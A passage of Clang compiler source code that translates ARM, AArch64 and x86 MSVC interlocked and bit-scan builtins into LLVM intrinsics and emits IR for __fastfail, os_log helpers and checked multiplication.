return MSVCIntrin::_InterlockedXor_rel;
case ARM::BI_InterlockedXor8_nf:
case ARM::BI_InterlockedXor16_nf:
case ARM::BI_InterlockedXor_nf:
case ARM::BI_InterlockedXor64_nf:
return MSVCIntrin::_InterlockedXor_nf;
case ARM::BI_InterlockedAnd8_acq:
case ARM::BI_InterlockedAnd16_acq:
case ARM::BI_InterlockedAnd_acq:
case ARM::BI_InterlockedAnd64_acq:
return MSVCIntrin::_InterlockedAnd_acq;
case ARM::BI_InterlockedAnd8_rel:
case ARM::BI_InterlockedAnd16_rel:
case ARM::BI_InterlockedAnd_rel:
case ARM::BI_InterlockedAnd64_rel:
return MSVCIntrin::_InterlockedAnd_rel;
case ARM::BI_InterlockedAnd8_nf:
case ARM::BI_InterlockedAnd16_nf:
case ARM::BI_InterlockedAnd_nf:
case ARM::BI_InterlockedAnd64_nf:
return MSVCIntrin::_InterlockedAnd_nf;
case ARM::BI_InterlockedIncrement16_acq:
case ARM::BI_InterlockedIncrement_acq:
case ARM::BI_InterlockedIncrement64_acq:
return MSVCIntrin::_InterlockedIncrement_acq;
case ARM::BI_InterlockedIncrement16_rel:
case ARM::BI_InterlockedIncrement_rel:
case ARM::BI_InterlockedIncrement64_rel:
return MSVCIntrin::_InterlockedIncrement_rel;
case ARM::BI_InterlockedIncrement16_nf:
case ARM::BI_InterlockedIncrement_nf:
case ARM::BI_InterlockedIncrement64_nf:
return MSVCIntrin::_InterlockedIncrement_nf;
case ARM::BI_InterlockedDecrement16_acq:
case ARM::BI_InterlockedDecrement_acq:
case ARM::BI_InterlockedDecrement64_acq:
return MSVCIntrin::_InterlockedDecrement_acq;
case ARM::BI_InterlockedDecrement16_rel:
case ARM::BI_InterlockedDecrement_rel:
case ARM::BI_InterlockedDecrement64_rel:
return MSVCIntrin::_InterlockedDecrement_rel;
case ARM::BI_InterlockedDecrement16_nf:
case ARM::BI_InterlockedDecrement_nf:
case ARM::BI_InterlockedDecrement64_nf:
return MSVCIntrin::_InterlockedDecrement_nf;
}
llvm_unreachable("must return from switch");
}
static Optional<CodeGenFunction::MSVCIntrin>
translateAarch64ToMsvcIntrin(unsigned BuiltinID) {
using MSVCIntrin = CodeGenFunction::MSVCIntrin;
switch (BuiltinID) {
default:
return None;
case AArch64::BI_BitScanForward:
case AArch64::BI_BitScanForward64:
return MSVCIntrin::_BitScanForward;
case AArch64::BI_BitScanReverse:
case AArch64::BI_BitScanReverse64:
return MSVCIntrin::_BitScanReverse;
case AArch64::BI_InterlockedAnd64:
return MSVCIntrin::_InterlockedAnd;
case AArch64::BI_InterlockedExchange64:
return MSVCIntrin::_InterlockedExchange;
case AArch64::BI_InterlockedExchangeAdd64:
return MSVCIntrin::_InterlockedExchangeAdd;
case AArch64::BI_InterlockedExchangeSub64:
return MSVCIntrin::_InterlockedExchangeSub;
case AArch64::BI_InterlockedOr64:
return MSVCIntrin::_InterlockedOr;
case AArch64::BI_InterlockedXor64:
return MSVCIntrin::_InterlockedXor;
case AArch64::BI_InterlockedDecrement64:
return MSVCIntrin::_InterlockedDecrement;
case AArch64::BI_InterlockedIncrement64:
return MSVCIntrin::_InterlockedIncrement;
case AArch64::BI_InterlockedExchangeAdd8_acq:
case AArch64::BI_InterlockedExchangeAdd16_acq:
case AArch64::BI_InterlockedExchangeAdd_acq:
case AArch64::BI_InterlockedExchangeAdd64_acq:
return MSVCIntrin::_InterlockedExchangeAdd_acq;
case AArch64::BI_InterlockedExchangeAdd8_rel:
case AArch64::BI_InterlockedExchangeAdd16_rel:
case AArch64::BI_InterlockedExchangeAdd_rel:
case AArch64::BI_InterlockedExchangeAdd64_rel:
return MSVCIntrin::_InterlockedExchangeAdd_rel;
case AArch64::BI_InterlockedExchangeAdd8_nf:
case AArch64::BI_InterlockedExchangeAdd16_nf:
case AArch64::BI_InterlockedExchangeAdd_nf:
case AArch64::BI_InterlockedExchangeAdd64_nf:
return MSVCIntrin::_InterlockedExchangeAdd_nf;
case AArch64::BI_InterlockedExchange8_acq:
case AArch64::BI_InterlockedExchange16_acq:
case AArch64::BI_InterlockedExchange_acq:
case AArch64::BI_InterlockedExchange64_acq:
return MSVCIntrin::_InterlockedExchange_acq;
case AArch64::BI_InterlockedExchange8_rel:
case AArch64::BI_InterlockedExchange16_rel:
case AArch64::BI_InterlockedExchange_rel:
case AArch64::BI_InterlockedExchange64_rel:
return MSVCIntrin::_InterlockedExchange_rel;
case AArch64::BI_InterlockedExchange8_nf:
case AArch64::BI_InterlockedExchange16_nf:
case AArch64::BI_InterlockedExchange_nf:
case AArch64::BI_InterlockedExchange64_nf:
return MSVCIntrin::_InterlockedExchange_nf;
case AArch64::BI_InterlockedCompareExchange8_acq:
case AArch64::BI_InterlockedCompareExchange16_acq:
case AArch64::BI_InterlockedCompareExchange_acq:
case AArch64::BI_InterlockedCompareExchange64_acq:
return MSVCIntrin::_InterlockedCompareExchange_acq;
case AArch64::BI_InterlockedCompareExchange8_rel:
case AArch64::BI_InterlockedCompareExchange16_rel:
case AArch64::BI_InterlockedCompareExchange_rel:
case AArch64::BI_InterlockedCompareExchange64_rel:
return MSVCIntrin::_InterlockedCompareExchange_rel;
case AArch64::BI_InterlockedCompareExchange8_nf:
case AArch64::BI_InterlockedCompareExchange16_nf:
case AArch64::BI_InterlockedCompareExchange_nf:
case AArch64::BI_InterlockedCompareExchange64_nf:
return MSVCIntrin::_InterlockedCompareExchange_nf;
case AArch64::BI_InterlockedCompareExchange128:
return MSVCIntrin::_InterlockedCompareExchange128;
case AArch64::BI_InterlockedCompareExchange128_acq:
return MSVCIntrin::_InterlockedCompareExchange128_acq;
case AArch64::BI_InterlockedCompareExchange128_nf:
return MSVCIntrin::_InterlockedCompareExchange128_nf;
case AArch64::BI_InterlockedCompareExchange128_rel:
return MSVCIntrin::_InterlockedCompareExchange128_rel;
case AArch64::BI_InterlockedOr8_acq:
case AArch64::BI_InterlockedOr16_acq:
case AArch64::BI_InterlockedOr_acq:
case AArch64::BI_InterlockedOr64_acq:
return MSVCIntrin::_InterlockedOr_acq;
case AArch64::BI_InterlockedOr8_rel:
case AArch64::BI_InterlockedOr16_rel:
case AArch64::BI_InterlockedOr_rel:
case AArch64::BI_InterlockedOr64_rel:
return MSVCIntrin::_InterlockedOr_rel;
case AArch64::BI_InterlockedOr8_nf:
case AArch64::BI_InterlockedOr16_nf:
case AArch64::BI_InterlockedOr_nf:
case AArch64::BI_InterlockedOr64_nf:
return MSVCIntrin::_InterlockedOr_nf;
case AArch64::BI_InterlockedXor8_acq:
case AArch64::BI_InterlockedXor16_acq:
case AArch64::BI_InterlockedXor_acq:
case AArch64::BI_InterlockedXor64_acq:
return MSVCIntrin::_InterlockedXor_acq;
case AArch64::BI_InterlockedXor8_rel:
case AArch64::BI_InterlockedXor16_rel:
case AArch64::BI_InterlockedXor_rel:
case AArch64::BI_InterlockedXor64_rel:
return MSVCIntrin::_InterlockedXor_rel;
case AArch64::BI_InterlockedXor8_nf:
case AArch64::BI_InterlockedXor16_nf:
case AArch64::BI_InterlockedXor_nf:
case AArch64::BI_InterlockedXor64_nf:
return MSVCIntrin::_InterlockedXor_nf;
case AArch64::BI_InterlockedAnd8_acq:
case AArch64::BI_InterlockedAnd16_acq:
case AArch64::BI_InterlockedAnd_acq:
case AArch64::BI_InterlockedAnd64_acq:
return MSVCIntrin::_InterlockedAnd_acq;
case AArch64::BI_InterlockedAnd8_rel:
case AArch64::BI_InterlockedAnd16_rel:
case AArch64::BI_InterlockedAnd_rel:
case AArch64::BI_InterlockedAnd64_rel:
return MSVCIntrin::_InterlockedAnd_rel;
case AArch64::BI_InterlockedAnd8_nf:
case AArch64::BI_InterlockedAnd16_nf:
case AArch64::BI_InterlockedAnd_nf:
case AArch64::BI_InterlockedAnd64_nf:
return MSVCIntrin::_InterlockedAnd_nf;
case AArch64::BI_InterlockedIncrement16_acq:
case AArch64::BI_InterlockedIncrement_acq:
case AArch64::BI_InterlockedIncrement64_acq:
return MSVCIntrin::_InterlockedIncrement_acq;
case AArch64::BI_InterlockedIncrement16_rel:
case AArch64::BI_InterlockedIncrement_rel:
case AArch64::BI_InterlockedIncrement64_rel:
return MSVCIntrin::_InterlockedIncrement_rel;
case AArch64::BI_InterlockedIncrement16_nf:
case AArch64::BI_InterlockedIncrement_nf:
case AArch64::BI_InterlockedIncrement64_nf:
return MSVCIntrin::_InterlockedIncrement_nf;
case AArch64::BI_InterlockedDecrement16_acq:
case AArch64::BI_InterlockedDecrement_acq:
case AArch64::BI_InterlockedDecrement64_acq:
return MSVCIntrin::_InterlockedDecrement_acq;
case AArch64::BI_InterlockedDecrement16_rel:
case AArch64::BI_InterlockedDecrement_rel:
case AArch64::BI_InterlockedDecrement64_rel:
return MSVCIntrin::_InterlockedDecrement_rel;
case AArch64::BI_InterlockedDecrement16_nf:
case AArch64::BI_InterlockedDecrement_nf:
case AArch64::BI_InterlockedDecrement64_nf:
return MSVCIntrin::_InterlockedDecrement_nf;
}
llvm_unreachable("must return from switch");
}
static Optional<CodeGenFunction::MSVCIntrin>
translateX86ToMsvcIntrin(unsigned BuiltinID) {
using MSVCIntrin = CodeGenFunction::MSVCIntrin;
switch (BuiltinID) {
default:
return None;
case clang::X86::BI_BitScanForward:
case clang::X86::BI_BitScanForward64:
return MSVCIntrin::_BitScanForward;
case clang::X86::BI_BitScanReverse:
case clang::X86::BI_BitScanReverse64:
return MSVCIntrin::_BitScanReverse;
case clang::X86::BI_InterlockedAnd64:
return MSVCIntrin::_InterlockedAnd;
case clang::X86::BI_InterlockedCompareExchange128:
return MSVCIntrin::_InterlockedCompareExchange128;
case clang::X86::BI_InterlockedExchange64:
return MSVCIntrin::_InterlockedExchange;
case clang::X86::BI_InterlockedExchangeAdd64:
return MSVCIntrin::_InterlockedExchangeAdd;
case clang::X86::BI_InterlockedExchangeSub64:
return MSVCIntrin::_InterlockedExchangeSub;
case clang::X86::BI_InterlockedOr64:
return MSVCIntrin::_InterlockedOr;
case clang::X86::BI_InterlockedXor64:
return MSVCIntrin::_InterlockedXor;
case clang::X86::BI_InterlockedDecrement64:
return MSVCIntrin::_InterlockedDecrement;
case clang::X86::BI_InterlockedIncrement64:
return MSVCIntrin::_InterlockedIncrement;
}
llvm_unreachable("must return from switch");
}
// Emit an MSVC intrinsic. Assumes that arguments have *not* been evaluated.
Value *CodeGenFunction::EmitMSVCBuiltinExpr(MSVCIntrin BuiltinID,
const CallExpr *E) {
switch (BuiltinID) {
case MSVCIntrin::_BitScanForward:
case MSVCIntrin::_BitScanReverse: {
Address IndexAddress(EmitPointerWithAlignment(E->getArg(0)));
Value *ArgValue = EmitScalarExpr(E->getArg(1));
llvm::Type *ArgType = ArgValue->getType();
llvm::Type *IndexType =
IndexAddress.getPointer()->getType()->getPointerElementType();
llvm::Type *ResultType = ConvertType(E->getType());
Value *ArgZero = llvm::Constant::getNullValue(ArgType);
Value *ResZero = llvm::Constant::getNullValue(ResultType);
Value *ResOne = llvm::ConstantInt::get(ResultType, 1);
BasicBlock *Begin = Builder.GetInsertBlock();
BasicBlock *End = createBasicBlock("bitscan_end", this->CurFn);
Builder.SetInsertPoint(End);
PHINode *Result = Builder.CreatePHI(ResultType, 2, "bitscan_result");
Builder.SetInsertPoint(Begin);
Value *IsZero = Builder.CreateICmpEQ(ArgValue, ArgZero);
BasicBlock *NotZero = createBasicBlock("bitscan_not_zero", this->CurFn);
Builder.CreateCondBr(IsZero, End, NotZero);
Result->addIncoming(ResZero, Begin);
Builder.SetInsertPoint(NotZero);
if (BuiltinID == MSVCIntrin::_BitScanForward) {
Function *F = CGM.getIntrinsic(Intrinsic::cttz, ArgType);
Value *ZeroCount = Builder.CreateCall(F, {ArgValue, Builder.getTrue()});
ZeroCount = Builder.CreateIntCast(ZeroCount, IndexType, false);
Builder.CreateStore(ZeroCount, IndexAddress, false);
} else {
unsigned ArgWidth = cast<llvm::IntegerType>(ArgType)->getBitWidth();
Value *ArgTypeLastIndex = llvm::ConstantInt::get(IndexType, ArgWidth - 1);
Function *F = CGM.getIntrinsic(Intrinsic::ctlz, ArgType);
Value *ZeroCount = Builder.CreateCall(F, {ArgValue, Builder.getTrue()});
ZeroCount = Builder.CreateIntCast(ZeroCount, IndexType, false);
Value *Index = Builder.CreateNSWSub(ArgTypeLastIndex, ZeroCount);
Builder.CreateStore(Index, IndexAddress, false);
}
Builder.CreateBr(End);
Result->addIncoming(ResOne, NotZero);
Builder.SetInsertPoint(End);
return Result;
}
case MSVCIntrin::_InterlockedAnd:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::And, E);
case MSVCIntrin::_InterlockedExchange:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Xchg, E);
case MSVCIntrin::_InterlockedExchangeAdd:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Add, E);
case MSVCIntrin::_InterlockedExchangeSub:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Sub, E);
case MSVCIntrin::_InterlockedOr:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Or, E);
case MSVCIntrin::_InterlockedXor:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Xor, E);
case MSVCIntrin::_InterlockedExchangeAdd_acq:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Add, E,
AtomicOrdering::Acquire);
case MSVCIntrin::_InterlockedExchangeAdd_rel:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Add, E,
AtomicOrdering::Release);
case MSVCIntrin::_InterlockedExchangeAdd_nf:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Add, E,
AtomicOrdering::Monotonic);
case MSVCIntrin::_InterlockedExchange_acq:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Xchg, E,
AtomicOrdering::Acquire);
case MSVCIntrin::_InterlockedExchange_rel:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Xchg, E,
AtomicOrdering::Release);
case MSVCIntrin::_InterlockedExchange_nf:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Xchg, E,
AtomicOrdering::Monotonic);
case MSVCIntrin::_InterlockedCompareExchange_acq:
return EmitAtomicCmpXchgForMSIntrin(*this, E, AtomicOrdering::Acquire);
case MSVCIntrin::_InterlockedCompareExchange_rel:
return EmitAtomicCmpXchgForMSIntrin(*this, E, AtomicOrdering::Release);
case MSVCIntrin::_InterlockedCompareExchange_nf:
return EmitAtomicCmpXchgForMSIntrin(*this, E, AtomicOrdering::Monotonic);
case MSVCIntrin::_InterlockedCompareExchange128:
return EmitAtomicCmpXchg128ForMSIntrin(
*this, E, AtomicOrdering::SequentiallyConsistent);
case MSVCIntrin::_InterlockedCompareExchange128_acq:
return EmitAtomicCmpXchg128ForMSIntrin(*this, E, AtomicOrdering::Acquire);
case MSVCIntrin::_InterlockedCompareExchange128_rel:
return EmitAtomicCmpXchg128ForMSIntrin(*this, E, AtomicOrdering::Release);
case MSVCIntrin::_InterlockedCompareExchange128_nf:
return EmitAtomicCmpXchg128ForMSIntrin(*this, E, AtomicOrdering::Monotonic);
case MSVCIntrin::_InterlockedOr_acq:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Or, E,
AtomicOrdering::Acquire);
case MSVCIntrin::_InterlockedOr_rel:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Or, E,
AtomicOrdering::Release);
case MSVCIntrin::_InterlockedOr_nf:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Or, E,
AtomicOrdering::Monotonic);
case MSVCIntrin::_InterlockedXor_acq:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Xor, E,
AtomicOrdering::Acquire);
case MSVCIntrin::_InterlockedXor_rel:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Xor, E,
AtomicOrdering::Release);
case MSVCIntrin::_InterlockedXor_nf:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Xor, E,
AtomicOrdering::Monotonic);
case MSVCIntrin::_InterlockedAnd_acq:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::And, E,
AtomicOrdering::Acquire);
case MSVCIntrin::_InterlockedAnd_rel:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::And, E,
AtomicOrdering::Release);
case MSVCIntrin::_InterlockedAnd_nf:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::And, E,
AtomicOrdering::Monotonic);
case MSVCIntrin::_InterlockedIncrement_acq:
return EmitAtomicIncrementValue(*this, E, AtomicOrdering::Acquire);
case MSVCIntrin::_InterlockedIncrement_rel:
return EmitAtomicIncrementValue(*this, E, AtomicOrdering::Release);
case MSVCIntrin::_InterlockedIncrement_nf:
return EmitAtomicIncrementValue(*this, E, AtomicOrdering::Monotonic);
case MSVCIntrin::_InterlockedDecrement_acq:
return EmitAtomicDecrementValue(*this, E, AtomicOrdering::Acquire);
case MSVCIntrin::_InterlockedDecrement_rel:
return EmitAtomicDecrementValue(*this, E, AtomicOrdering::Release);
case MSVCIntrin::_InterlockedDecrement_nf:
return EmitAtomicDecrementValue(*this, E, AtomicOrdering::Monotonic);
case MSVCIntrin::_InterlockedDecrement:
return EmitAtomicDecrementValue(*this, E);
case MSVCIntrin::_InterlockedIncrement:
return EmitAtomicIncrementValue(*this, E);
case MSVCIntrin::__fastfail: {
// Request immediate process termination from the kernel. The instruction
// sequences to do this are documented on MSDN:
// https://msdn.microsoft.com/en-us/library/dn774154.aspx
llvm::Triple::ArchType ISA = getTarget().getTriple().getArch();
StringRef Asm, Constraints;
switch (ISA) {
default:
ErrorUnsupported(E, "__fastfail call for this architecture");
break;
case llvm::Triple::x86:
case llvm::Triple::x86_64:
Asm = "int $$0x29";
Constraints = "{cx}";
break;
case llvm::Triple::thumb:
Asm = "udf #251";
Constraints = "{r0}";
break;
case llvm::Triple::aarch64:
Asm = "brk #0xF003";
Constraints = "{w0}";
}
llvm::FunctionType *FTy = llvm::FunctionType::get(VoidTy, {Int32Ty}, false);
llvm::InlineAsm *IA =
llvm::InlineAsm::get(FTy, Asm, Constraints, /*hasSideEffects=*/true);
llvm::AttributeList NoReturnAttr = llvm::AttributeList::get(
getLLVMContext(), llvm::AttributeList::FunctionIndex,
llvm::Attribute::NoReturn);
llvm::CallInst *CI = Builder.CreateCall(IA, EmitScalarExpr(E->getArg(0)));
CI->setAttributes(NoReturnAttr);
return CI;
}
}
llvm_unreachable("Incorrect MSVC intrinsic!");
}
namespace {
// ARC cleanup for __builtin_os_log_format
struct CallObjCArcUse final : EHScopeStack::Cleanup {
CallObjCArcUse(llvm::Value *object) : object(object) {}
llvm::Value *object;
void Emit(CodeGenFunction &CGF, Flags flags) override {
CGF.EmitARCIntrinsicUse(object);
}
};
}
Value *CodeGenFunction::EmitCheckedArgForBuiltin(const Expr *E,
BuiltinCheckKind Kind) {
assert((Kind == BCK_CLZPassedZero || Kind == BCK_CTZPassedZero)
&& "Unsupported builtin check kind");
Value *ArgValue = EmitScalarExpr(E);
if (!SanOpts.has(SanitizerKind::Builtin) || !getTarget().isCLZForZeroUndef())
return ArgValue;
SanitizerScope SanScope(this);
Value *Cond = Builder.CreateICmpNE(
ArgValue, llvm::Constant::getNullValue(ArgValue->getType()));
EmitCheck(std::make_pair(Cond, SanitizerKind::Builtin),
SanitizerHandler::InvalidBuiltin,
{EmitCheckSourceLocation(E->getExprLoc()),
llvm::ConstantInt::get(Builder.getInt8Ty(), Kind)},
None);
return ArgValue;
}
/// Get the argument type for arguments to os_log_helper.
static CanQualType getOSLogArgType(ASTContext &C, int Size) {
QualType UnsignedTy = C.getIntTypeForBitwidth(Size * 8, /*Signed=*/false);
return C.getCanonicalType(UnsignedTy);
}
llvm::Function *CodeGenFunction::generateBuiltinOSLogHelperFunction(
const analyze_os_log::OSLogBufferLayout &Layout,
CharUnits BufferAlignment) {
ASTContext &Ctx = getContext();
llvm::SmallString<64> Name;
{
raw_svector_ostream OS(Name);
OS << "__os_log_helper";
OS << "_" << BufferAlignment.getQuantity();
OS << "_" << int(Layout.getSummaryByte());
OS << "_" << int(Layout.getNumArgsByte());
for (const auto &Item : Layout.Items)
OS << "_" << int(Item.getSizeByte()) << "_"
<< int(Item.getDescriptorByte());
}
if (llvm::Function *F = CGM.getModule().getFunction(Name))
return F;
llvm::SmallVector<QualType, 4> ArgTys;
FunctionArgList Args;
Args.push_back(ImplicitParamDecl::Create(
Ctx, nullptr, SourceLocation(), &Ctx.Idents.get("buffer"), Ctx.VoidPtrTy,
ImplicitParamDecl::Other));
ArgTys.emplace_back(Ctx.VoidPtrTy);
for (unsigned int I = 0, E = Layout.Items.size(); I < E; ++I) {
char Size = Layout.Items[I].getSizeByte();
if (!Size)
continue;
QualType ArgTy = getOSLogArgType(Ctx, Size);
Args.push_back(ImplicitParamDecl::Create(
Ctx, nullptr, SourceLocation(),
&Ctx.Idents.get(std::string("arg") + llvm::to_string(I)), ArgTy,
ImplicitParamDecl::Other));
ArgTys.emplace_back(ArgTy);
}
QualType ReturnTy = Ctx.VoidTy;
// The helper function has linkonce_odr linkage to enable the linker to merge
// identical functions. To ensure the merging always happens, 'noinline' is
// attached to the function when compiling with -Oz.
const CGFunctionInfo &FI =
CGM.getTypes().arrangeBuiltinFunctionDeclaration(ReturnTy, Args);
llvm::FunctionType *FuncTy = CGM.getTypes().GetFunctionType(FI);
llvm::Function *Fn = llvm::Function::Create(
FuncTy, llvm::GlobalValue::LinkOnceODRLinkage, Name, &CGM.getModule());
Fn->setVisibility(llvm::GlobalValue::HiddenVisibility);
CGM.SetLLVMFunctionAttributes(GlobalDecl(), FI, Fn, /*IsThunk=*/false);
CGM.SetLLVMFunctionAttributesForDefinition(nullptr, Fn);
Fn->setDoesNotThrow();
// Attach 'noinline' at -Oz.
if (CGM.getCodeGenOpts().OptimizeSize == 2)
Fn->addFnAttr(llvm::Attribute::NoInline);
auto NL = ApplyDebugLocation::CreateEmpty(*this);
StartFunction(GlobalDecl(), ReturnTy, Fn, FI, Args);
// Create a scope with an artificial location for the body of this function.
auto AL = ApplyDebugLocation::CreateArtificial(*this);
CharUnits Offset;
Address BufAddr(Builder.CreateLoad(GetAddrOfLocalVar(Args[0]), "buf"),
BufferAlignment);
Builder.CreateStore(Builder.getInt8(Layout.getSummaryByte()),
Builder.CreateConstByteGEP(BufAddr, Offset++, "summary"));
Builder.CreateStore(Builder.getInt8(Layout.getNumArgsByte()),
Builder.CreateConstByteGEP(BufAddr, Offset++, "numArgs"));
unsigned I = 1;
for (const auto &Item : Layout.Items) {
Builder.CreateStore(
Builder.getInt8(Item.getDescriptorByte()),
Builder.CreateConstByteGEP(BufAddr, Offset++, "argDescriptor"));
Builder.CreateStore(
Builder.getInt8(Item.getSizeByte()),
Builder.CreateConstByteGEP(BufAddr, Offset++, "argSize"));
CharUnits Size = Item.size();
if (!Size.getQuantity())
continue;
Address Arg = GetAddrOfLocalVar(Args[I]);
Address Addr = Builder.CreateConstByteGEP(BufAddr, Offset, "argData");
Addr = Builder.CreateBitCast(Addr, Arg.getPointer()->getType(),
"argDataCast");
Builder.CreateStore(Builder.CreateLoad(Arg), Addr);
Offset += Size;
++I;
}
FinishFunction();
return Fn;
}
RValue CodeGenFunction::emitBuiltinOSLogFormat(const CallExpr &E) {
assert(E.getNumArgs() >= 2 &&
"__builtin_os_log_format takes at least 2 arguments");
ASTContext &Ctx = getContext();
analyze_os_log::OSLogBufferLayout Layout;
analyze_os_log::computeOSLogBufferLayout(Ctx, &E, Layout);
Address BufAddr = EmitPointerWithAlignment(E.getArg(0));
llvm::SmallVector<llvm::Value *, 4> RetainableOperands;
// Ignore argument 1, the format string. It is not currently used.
CallArgList Args;
Args.add(RValue::get(BufAddr.getPointer()), Ctx.VoidPtrTy);
for (const auto &Item : Layout.Items) {
int Size = Item.getSizeByte();
if (!Size)
continue;
llvm::Value *ArgVal;
if (Item.getKind() == analyze_os_log::OSLogBufferItem::MaskKind) {
uint64_t Val = 0;
for (unsigned I = 0, E = Item.getMaskType().size(); I < E; ++I)
Val |= ((uint64_t)Item.getMaskType()[I]) << I * 8;
ArgVal = llvm::Constant::getIntegerValue(Int64Ty, llvm::APInt(64, Val));
} else if (const Expr *TheExpr = Item.getExpr()) {
ArgVal = EmitScalarExpr(TheExpr, /*Ignore*/ false);
// If a temporary object that requires destruction after the full
// expression is passed, push a lifetime-extended cleanup to extend its
// lifetime to the end of the enclosing block scope.
auto LifetimeExtendObject = [&](const Expr *E) {
E = E->IgnoreParenCasts();
// Extend lifetimes of objects returned by function calls and message
// sends.
// FIXME: We should do this in other cases in which temporaries are
// created including arguments of non-ARC types (e.g., C++
// temporaries).
if (isa<CallExpr>(E) || isa<ObjCMessageExpr>(E))
return true;
return false;
};
if (TheExpr->getType()->isObjCRetainableType() &&
getLangOpts().ObjCAutoRefCount && LifetimeExtendObject(TheExpr)) {
assert(getEvaluationKind(TheExpr->getType()) == TEK_Scalar &&
"Only scalar can be a ObjC retainable type");
if (!isa<Constant>(ArgVal)) {
CleanupKind Cleanup = getARCCleanupKind();
QualType Ty = TheExpr->getType();
Address Alloca = Address::invalid();
Address Addr = CreateMemTemp(Ty, "os.log.arg", &Alloca);
ArgVal = EmitARCRetain(Ty, ArgVal);
Builder.CreateStore(ArgVal, Addr);
pushLifetimeExtendedDestroy(Cleanup, Alloca, Ty,
CodeGenFunction::destroyARCStrongPrecise,
Cleanup & EHCleanup);
// Push a clang.arc.use call to ensure ARC optimizer knows that the
// argument has to be alive.
if (CGM.getCodeGenOpts().OptimizationLevel != 0)
pushCleanupAfterFullExpr<CallObjCArcUse>(Cleanup, ArgVal);
}
}
} else {
ArgVal = Builder.getInt32(Item.getConstValue().getQuantity());
}
unsigned ArgValSize =
CGM.getDataLayout().getTypeSizeInBits(ArgVal->getType());
llvm::IntegerType *IntTy = llvm::Type::getIntNTy(getLLVMContext(),
ArgValSize);
ArgVal = Builder.CreateBitOrPointerCast(ArgVal, IntTy);
CanQualType ArgTy = getOSLogArgType(Ctx, Size);
// If ArgVal has type x86_fp80, zero-extend ArgVal.
ArgVal = Builder.CreateZExtOrBitCast(ArgVal, ConvertType(ArgTy));
Args.add(RValue::get(ArgVal), ArgTy);
}
const CGFunctionInfo &FI =
CGM.getTypes().arrangeBuiltinFunctionCall(Ctx.VoidTy, Args);
llvm::Function *F = CodeGenFunction(CGM).generateBuiltinOSLogHelperFunction(
Layout, BufAddr.getAlignment());
EmitCall(FI, CGCallee::forDirect(F), ReturnValueSlot(), Args);
return RValue::get(BufAddr.getPointer());
}
static bool isSpecialUnsignedMultiplySignedResult(
unsigned BuiltinID, WidthAndSignedness Op1Info, WidthAndSignedness Op2Info,
WidthAndSignedness ResultInfo) {
return BuiltinID == Builtin::BI__builtin_mul_overflow &&
Op1Info.Width == Op2Info.Width && Op2Info.Width == ResultInfo.Width &&
!Op1Info.Signed && !Op2Info.Signed && ResultInfo.Signed;
}
static RValue EmitCheckedUnsignedMultiplySignedResult(
CodeGenFunction &CGF, const clang::Expr *Op1, WidthAndSignedness Op1Info,
const clang::Expr *Op2, WidthAndSignedness Op2Info,
const clang::Expr *ResultArg, QualType ResultQTy,
WidthAndSignedness ResultInfo) {
assert(isSpecialUnsignedMultiplySignedResult(
Builtin::BI__builtin_mul_overflow, Op1Info, Op2Info, ResultInfo) &&
"Cannot specialize this multiply");
llvm::Value *V1 = CGF.EmitScalarExpr(Op1);
llvm::Value *V2 = CGF.EmitScalarExpr(Op2);
llvm::Value *HasOverflow;
llvm::Value *Result = EmitOverflowIntrinsic(
CGF, llvm::Intrinsic::umul_with_overflow, V1, V2, HasOverflow);
// The intrinsic call will detect overflow when the value is > UINT_MAX,
// however, since the original builtin had a signed result, we need to report
// an overflow when the result is greater than INT_MAX.
auto IntMax = llvm::APInt::getSignedMaxValue(ResultInfo.Width);
llvm::Value *IntMaxValue = llvm::ConstantInt::get(Result->getType(), IntMax);
llvm::Value *IntMaxOverflow = CGF.Builder.CreateICmpUGT(Result, IntMaxValue);
HasOverflow = CGF.Builder.CreateOr(HasOverflow, IntMaxOverflow);
bool isVolatile =
ResultArg->getType()->getPointeeType().isVolatileQualified();
Address ResultPtr = CGF.EmitPointerWithAlignment(ResultArg);
CGF.Builder.CreateStore(CGF.EmitToMemory(Result, ResultQTy), ResultPtr,
isVolatile);
return RValue::get(HasOverflow);
}
/// Determine if a binop is a checked mixed-sign multiply we can specialize.
static bool isSpecialMixedSignMultiply(unsigned BuiltinID,
WidthAndSignedness Op1Info,
WidthAndSignedness Op2Info,
WidthAndSignedness ResultInfo) {
return BuiltinID == Builtin::BI__builtin_mul_overflow &&
std::max(Op1Info.Width, Op2Info.Width) >= ResultInfo.Width &&
Op1Info.Signed != Op2Info.Signed;
}
/// Emit a checked mixed-sign multiply. This is a cheaper specialization of
/// the generic checked-binop irgen.
static RValue
EmitCheckedMixedSignMultiply(CodeGenFunction &CGF, const clang::Expr *Op1,
WidthAndSignedness Op1Info, const clang::Expr *Op2,
WidthAndSignedness Op2Info,
const clang::Expr *ResultArg, QualType ResultQTy,
WidthAndSignedness ResultInfo) {
assert(isSpecialMixedSignMultiply(Builtin::BI__builtin_mul_overflow, Op1Info,
Op2Info, ResultInfo) &&
"Not a mixed-sign multipliction we can specialize");
// Emit the signed and unsigned operands.
const clang::Expr *SignedOp = Op1Info.Signed ? Op1 : Op2;
const clang::Expr *UnsignedOp = Op1Info.Signed ? Op2 : Op1;
llvm::Value *Signed = CGF.EmitScalarExpr(SignedOp);
llvm::Value *Unsigned = CGF.EmitScalarExpr(UnsignedOp);
unsigned SignedOpWidth = Op1Info.Signed ? Op1Info.Width : Op2Info.Width;
unsigned UnsignedOpWidth = Op1Info.Signed ? Op2Info.Width : Op1Info.Width;
// One of the operands may be smaller than the other. If so, [s|z]ext it.
